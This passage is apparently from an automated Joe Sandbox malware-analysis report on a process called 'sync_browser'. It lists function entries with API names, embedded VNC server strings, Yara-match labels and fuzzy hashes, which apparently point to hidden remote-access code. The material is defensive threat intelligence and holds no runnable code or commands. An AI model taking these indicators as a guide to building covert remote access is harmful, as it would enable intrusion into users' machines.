                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$User$InformationNameObjectProcessRevertSelfStationWindow
                                                                      • String ID: vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - ERROR : No window station $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: NOT impersonating user $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: No user logged on $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Unknown OS $vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - Error: Usersize 0$vncservice.cpp : @@@@@@@@@@@@@ GetCurrentUser - UserNAme found: %s $vncservice.cpp : getusername error %d
                                                                      • API String ID: 3635673080-2232443292
                                                                      • Opcode ID: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                      • Instruction ID: ba7efcf136e516ec05dc8aca83462afc4a8f7bd6b31430ed7eea2138260ba59d
                                                                      • Opcode Fuzzy Hash: df8b4108ed97db498e513780486a315d6e916c093cc0dcc6e4f94b4d88527eb8
                                                                      • Instruction Fuzzy Hash: A2417F25E0C64B86FB10BB24F8603B9E3A1AF84B48FC40437E60DC6569EE7DE455C722

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
                                                                      • API String ID: 3168844106-4245644328
                                                                      • Opcode ID: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                      • Instruction ID: a3774ef9e985693c1cd3b013301632d55d21c0b53fd8c99bf5394f1b9b00011a
                                                                      • Opcode Fuzzy Hash: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
                                                                      • Instruction Fuzzy Hash: 6461662290CA8A87E770AB39A454379E3A0FB44F54F945132EA5EC76E4DF3CD405C712

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Service$CloseConfigEnumErrorHandleLastOpenQueryServicesStatus$Manager
                                                                      • String ID:
                                                                      • API String ID: 3151975580-0
                                                                      • Opcode ID: 2bd10b3906a7b2c812c4d056fde43adfe123f9b05cd6780d6db58cbf665bb52e
                                                                      • Instruction ID: 226ad1e2d412f391aa205887807fea5bfa422fbe5ea5fadbdb4fc5c313c38730
                                                                      • Opcode Fuzzy Hash: 2bd10b3906a7b2c812c4d056fde43adfe123f9b05cd6780d6db58cbf665bb52e
                                                                      • Instruction Fuzzy Hash: 5A918222B08A4589FB10EB71E4257BDB3B1AB44BA8F804636EE2D57BD8DF38D505C311

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: free$Object$Delete$MessageSend$FreeLibrarySingleWait
                                                                      • String ID: vncclient.cpp : deleting socket$vncclient.cpp : ~vncClient() executing...
                                                                      • API String ID: 2172171234-2418058073
                                                                      • Opcode ID: ae43704471dc359bc283cfe2eb67b83c9c223570d8a40ab8efa04644ebaf49f5
                                                                      • Instruction ID: e80106d99ef05142c99834a53e7dec9d395d57d02c66ef79e6c306bc67671356
                                                                      • Opcode Fuzzy Hash: ae43704471dc359bc283cfe2eb67b83c9c223570d8a40ab8efa04644ebaf49f5
                                                                      • Instruction Fuzzy Hash: AA813C35609A8985EB54EF75E4643B9A360FF84F84F844136EA0D8B799CF39D451C332

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessageSend$DialogItemLongWindowmallocstd::exception::exception
                                                                      • String ID:
                                                                      • API String ID: 1935883720-0
                                                                      • Opcode ID: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                                      • Instruction ID: 526bbf9ebc192ce1d568d8ca13802a3e40a08fdff56d65df26cd98552e119c4c
                                                                      • Opcode Fuzzy Hash: 7be5ccecca7b2e798f0e3ae60729954586f2e76e6c9a6f26eb5410dab4250f23
                                                                      • Instruction Fuzzy Hash: 1761EC31B08A4985EB20EB25E4647BAA351FB89FD0F945132DD5D87798DF3CD445C312

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$Current$CriticalSectionThread$Process$AllocDuplicateEnterExceptionHandleInitializeLeavePriorityRaiseReleaseSemaphoreValue
                                                                      • String ID:
                                                                      • API String ID: 772457954-0
                                                                      • Opcode ID: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                                      • Instruction ID: e9fc28b64ffc85f430df088c66dc08d83b0f58140881ac12edef19fa544bc859
                                                                      • Opcode Fuzzy Hash: 6724cc30325cfb9ab06b351ea06354c6b11979decb25812fb5b84730cc05a7b3
                                                                      • Instruction Fuzzy Hash: 70615E35A0874A86EB50BF25B464379A3A0FF44F84F941136DA4E83769EF3CE445C762

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeaveSleepsprintfswscanf
                                                                      • String ID: 0.0.0.0$REP$RFB$RFB %03d.%03d$false$i$true$vncclient.cpp : m_ms_logon set to %s
                                                                      • API String ID: 958158500-3765181313
                                                                      • Opcode ID: 1eb8a27b6a294cbb1bbf7568b07f20689580138f24bb599d5c02435dd9ce633d
                                                                      • Instruction ID: 4d82ccf73ffc87f58064dd6ec23c55a8609100980c58411820d37766352fee25
                                                                      • Opcode Fuzzy Hash: 1eb8a27b6a294cbb1bbf7568b07f20689580138f24bb599d5c02435dd9ce633d
                                                                      • Instruction Fuzzy Hash: EC91D226608B8A86E760EB35E468BAAB3A0FB44F94F840133EA4D87794DF3CD545C711

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Process$AddressCloseHandleLibraryOpenProc$CreateCurrentFirstFreeLoadMetricsProcess32SessionSnapshotSystemTokenToolhelp32
                                                                      • String ID: ?
                                                                      • API String ID: 2900023865-1684325040
                                                                      • Opcode ID: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                      • Instruction ID: 762007e4f65f378b637838f96f843408a8fbf8da31adedde7209c1f6ae744b00
                                                                      • Opcode Fuzzy Hash: febb9543f439330e09f6a3bb3b030836e2934ac63594c7e2729f7f74b439011d
                                                                      • Instruction Fuzzy Hash: 18313F3160CB8986E760AF21F45436AB3A4FB89B94F800036DA8D87B58EF3DD005CB51

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateRect$AddressLibraryLoadProcmalloc
                                                                      • String ID: SendInput$USER32$vncclient.cpp : TEST 4$vncclient.cpp : vncClient() executing...
                                                                      • API String ID: 1369618222-3178290357
                                                                      • Opcode ID: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                                      • Instruction ID: ed18af5ac9c42f339c539b7b4ba059c84537b5a7c5db15a08256d04a43403133
                                                                      • Opcode Fuzzy Hash: 59c5cb1e7166b4b1d70f07f65a41a2d60febf100e89283cd68553da4dcc8056f
                                                                      • Instruction Fuzzy Hash: 77B16932225BD096E348DF28EA543D9B7A8F740F44F54423AE3A847B91CF7A6076C751

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast$CriticalSectionThread$EnterExceptionLeavePriorityRaiseResume
                                                                      • String ID:
                                                                      • API String ID: 1366308849-0
                                                                      • Opcode ID: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                      • Instruction ID: 93f6ffecab3a1f5453c082dfa02c71ab7874139792bdf2f96f688df18f9af782
                                                                      • Opcode Fuzzy Hash: 63ef2765017d1710e1b3fde4549e7b5a362e36a6304331ef8a9692e50ded8925
                                                                      • Instruction Fuzzy Hash: CF316F21A0864B86EB10BF24F464269B3A0FF85B58FA00537E65D826ADDF3CD449C722

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: setsockopt$ConnectionIoctlStatsgetpeernamegetsockname
                                                                      • String ID:
                                                                      • API String ID: 2120259006-0
                                                                      • Opcode ID: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                      • Instruction ID: 8549fee39abaf6c80638362f26966d2318529cb8534db75773041bc7bd242b9b
                                                                      • Opcode Fuzzy Hash: c49f95ef961e3e379a6d047de3f2c4db0e5666ab8321b85981a4bd72149005e7
                                                                      • Instruction Fuzzy Hash: 96514872204B85DED724DF30E4947E9B7A4FB4870CF404526EB5C87A48DB78D6A5CB60

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateErrorLastThread_errno_getptd_invalid_parameter_noinfofree
                                                                      • String ID:
                                                                      • API String ID: 3283625137-0
                                                                      • Opcode ID: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                      • Instruction ID: 222b324c80459bedcf2f724c01d433a893bf9aabc6358248f66c8596dc934009
                                                                      • Opcode Fuzzy Hash: d7d1bbc1acb5388812442ca131e75b053374a14ef8d2c0d32f7c34c2cb7a35d3
                                                                      • Instruction Fuzzy Hash: F7219221A0878986E614BB51B4613AAE290BF45F90FC54236EE6D83BDADF3CE051C716

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ComputerLibraryLoadName
                                                                      • String ID: RICHED32.DLL$Rich Edit Dll Loading$Unable to load the Rich Edit (RICHED32.DLL) control!
                                                                      • API String ID: 2278097360-3189507618
                                                                      • Opcode ID: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                      • Instruction ID: 0170441b5e0f8f26bd586020826edf5fab81e3a00457284a359e63dd33675e3b
                                                                      • Opcode Fuzzy Hash: a0e48cd9bca1a580f90c0fe309f8f060cfac1904e258431fe3c2638ac3c22389
                                                                      • Instruction Fuzzy Hash: 5831BE21B09B4A81EB54FB2AF42432A7690EF85F58F444139D64E873E9EE3DC445C362
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessWindow$CurrentFindMessagePostThread
                                                                      • String ID: WinVNC Tray Icon
                                                                      • API String ID: 2660421340-1071638575
                                                                      • Opcode ID: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                      • Instruction ID: c5d8daad50093c94a8488c434d84ee2812b77b13543c17bd0f8250a0ba7b95e1
                                                                      • Opcode Fuzzy Hash: 559e961aba49f3495be4a1de55413b2cc06c1e4dbc84eeda83157a0626d0a607
                                                                      • Instruction Fuzzy Hash: 6C01A731608B8582E7146F52B854696F760FB48FD4F945036EE4D43B58EE7CD485C700
                                                                      APIs
                                                                      Strings
                                                                      • vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash , xrefs: 00007FF7E5093490
                                                                      • vncclient.cpp : failed to set socket timeout(%d), xrefs: 00007FF7E50933D9
                                                                      • vncclient.cpp : DSMPlugin Pointer to socket OK, xrefs: 00007FF7E5093429
                                                                      • vncclient.cpp : Invalid DSMPlugin Pointer, xrefs: 00007FF7E5093502
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: vncclient.cpp : A connection using DSM already exist - client rejected to avoid crash $vncclient.cpp : DSMPlugin Pointer to socket OK$vncclient.cpp : Invalid DSMPlugin Pointer$vncclient.cpp : failed to set socket timeout(%d)
                                                                      • API String ID: 1452528299-2001727811
                                                                      • Opcode ID: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
                                                                      • Instruction ID: d50f108c80a432c9e94cf9af96c84636c44e046e7d2da8dad9fdcd8e04a7cd16
                                                                      • Opcode Fuzzy Hash: 4d081dc491a9ac6cbd13230380636544dfc8f183765b0f0986b9e0b49d768617
                                                                      • Instruction Fuzzy Hash: 23410C66A05A89C5EB50AF2AD0943FD67A0FB84F44F994072DE0D877A4DF3DD489C322
                                                                      APIs
                                                                      Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: CriticalSection$malloc$CreateEnterErrorInitializeLastLeaveSemaphoregetpeernameinet_ntoa
• String ID: <unavailable>
• API String ID: 4131039871-1096956887
• Opcode ID: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
• Instruction ID: d9beb526fbe4d358aa5c6c11df3c74c96f123bb7acab6aa50510f30a05d67fdd
• Opcode Fuzzy Hash: 662e7cd3472f8606c1dbc32a9fae7d2c30d9cf2075c004d535a59fbb274039f5
• Instruction Fuzzy Hash: 18319032604B8AC2EB50EF24F4643A9B3A0FB88B94F540136DA9D87798DF3CD454C751
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: connectgethostbynamehtonsinet_addr
• String ID:
• API String ID: 599670773-0
• Opcode ID: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
• Instruction ID: 70f5730fd70ca2a6e7b193d3e08dd319707b03a852fe8f25af2a8d5d8aa51fe6
• Opcode Fuzzy Hash: d38f48bb9340a20dfa4c775536a6897ee0645aa6d2a7bb91f90b264e8001bf38
• Instruction Fuzzy Hash: 3A119A25A18A4982EB64AB35F851339B390FF88F95F404136EA4DC7794EF3CD400C715
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: _callnewh_errno$AllocHeapmalloc
• String ID: bad allocation
• API String ID: 3727741168-2104205924
• Opcode ID: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
• Instruction ID: 598a9005047deb3e8eab6d9b418de1b8cf4238ed9a21d8b69f85d06d0694c873
• Opcode Fuzzy Hash: 921c28abbcbf2c5a57674bbbd0c3a74825746961c44d3ad5b5d496d2e089f50c
• Instruction Fuzzy Hash: 16012A69A4878FD1EA10BB10B4702BAA351BF44B90FD41137D94DC66AAEF3CE105D723
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: FindMessagePostWindow
• String ID: WinVNC Tray Icon
• API String ID: 2578315405-1071638575
• Opcode ID: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
• Instruction ID: d91081af20975e04cb310d75cc2874ea9096e7136922ceba047c631b3865b748
• Opcode Fuzzy Hash: b55735387d5fcc8609d7e23d94c71180556838aa6ba5d63fb9eaeb7151e3a813
• Instruction Fuzzy Hash: D2014432E18A4582EB649B16F450369A350FB88FC4F885036FE5E93B59DF3CD4918B15
APIs
Strings
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: closesocketshutdown
• String ID: vsocket.cpp : closing socket
• API String ID: 572888783-2569437896
• Opcode ID: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
• Instruction ID: 0675182382a8359191c6c607fbd0d58c7d7fe407c32e9aa6b79e9ba3aeeebb33
• Opcode Fuzzy Hash: 8dc3be72fa35b56882547eaf8baed56a0b94c43c4fc04f31f3c72a1815f57b02
• Instruction Fuzzy Hash: 90F04F75610B4983EB24AF70D4643B87320FF84F15F605636DA2D862D9DF38C455C362
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: selectsend
• String ID:
• API String ID: 2999949978-0
• Opcode ID: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
• Instruction ID: df7cbba1f50e2ce5459cd9d06256db5febad60dd418d495735ba113c868417b1
• Opcode Fuzzy Hash: e4fa7076d3caa874285a54a3ee283af3e05e33e5fe15350dd15a6e5305daa52a
• Instruction Fuzzy Hash: 5B312923A18A8A47EA706F25B8647B6E390FF85F59F841132FD4D83A54DF3ED8018721
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: AllocHeap_callnewh_errno
• String ID:
• API String ID: 849339952-0
• Opcode ID: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
• Instruction ID: 3cd3917b1f309cb7fe38012d8c6786d28f4dd7a5d528e0f692f5331715611e95
• Opcode Fuzzy Hash: 168cf3911275e585727ccf2278bdf0a034da8738718f6c23c6dd903017626324
• Instruction Fuzzy Hash: 33118611B0DA4A81FE557F51B674778F2D19F44FA0F894632C91D86ACCDE7CA4408662
APIs
Memory Dump Source
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
Yara matches
Similarity
• API ID: FreeLibraryMessageSend
• String ID:
• API String ID: 3583424976-0
• Opcode ID: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
• Instruction ID: 443c1ce0d1c28eb6e880eccc6cd3c3eb2ff1895d87efc868216599975c14abd6
• Opcode Fuzzy Hash: 5a9c5ba6fc8a087abeda093f91cff5a2c035cde94b70426cc823780c6ac37473
• Instruction Fuzzy Hash: ED111C29F0A64995FE59FBB1A471B799350DF94F58F880532DD0E86A498E3CF440D322
APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: closesocketsetsockoptshutdownsocket
                                                                      • String ID:
                                                                      • API String ID: 3513852771-0
